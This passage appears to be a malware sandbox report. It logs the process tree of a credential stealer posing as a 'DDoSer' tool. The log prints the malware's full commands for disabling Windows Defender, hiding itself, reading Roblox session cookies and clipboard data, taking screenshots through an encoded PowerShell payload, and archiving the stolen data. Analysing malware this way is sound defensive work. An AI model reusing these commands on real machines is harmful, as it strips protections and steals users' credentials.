- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:32
- C:\Users\Admin\AppData\Local\Temp\DDOSERFORWINDOWS11_protected.exe
  "C:\Users\Admin\AppData\Local\Temp\DDOSERFORWINDOWS11_protected.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Drops file in Drivers directory
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\DDOSERFORWINDOWS11_protected.exe'"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1604
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\DDOSERFORWINDOWS11_protected.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3648
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()""
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2924
  - - C:\Windows\SysWOW64\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1748
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3256
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3600
  - - C:\Windows\SysWOW64\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      System Location Discovery: System Language Discovery
      PID:3496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3008
  - - C:\Windows\SysWOW64\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      System Location Discovery: System Language Discovery
      PID:2672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2944
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:2584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4336
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      System Location Discovery: System Language Discovery
      Detects videocard installed
      PID:896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\DDOSERFORWINDOWS11_protected.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - System Location Discovery: System Language Discovery
    PID:3088
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\DDOSERFORWINDOWS11_protected.exe"
      4⤵
      Views/modifies file attributes
      PID:388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌ .scr'"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4140
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2252
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:2616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3820
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2308
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      System Location Discovery: System Language Discovery
      PID:1896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1172
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:3968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1376
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:1544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3324
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:3592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4752
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1900
  - - C:\Windows\SysWOW64\systeminfo.exe
      systeminfo
      4⤵
      System Location Discovery: System Language Discovery
      Gathers system information
      PID:452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2304
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:428
  - - C:\Windows\SysWOW64\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      System Location Discovery: System Language Discovery
      PID:2144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:1572
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2584
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iejzvguq\iejzvguq.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1152
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB3BF.tmp" "c:\Users\Admin\AppData\Local\Temp\iejzvguq\CSC4B51780645B45F3AC56226E4CE5E34.TMP"
        6⤵
        
        PID:2144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1472
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:1792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1720
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:3288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1332
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:3716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3628
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:4264
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:848
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:4504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:744
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2600
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:4020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2516
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:4564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3364
  - - C:\Windows\SysWOW64\getmac.exe
      getmac
      4⤵
      System Location Discovery: System Language Discovery
      PID:1332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2452
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:3008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:848
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:3704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI322\rar.exe a -r -hp"grabber" "C:\Users\Admin\AppData\Local\Temp\6lReA.zip" *"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2376
  - - C:\Users\Admin\AppData\Local\Temp\_MEI322\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI322\rar.exe a -r -hp"grabber" "C:\Users\Admin\AppData\Local\Temp\6lReA.zip" *
      4⤵
      Executes dropped EXE
      PID:1488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1860
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      System Location Discovery: System Language Discovery
      PID:2284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:764
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      System Location Discovery: System Language Discovery
      PID:2244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
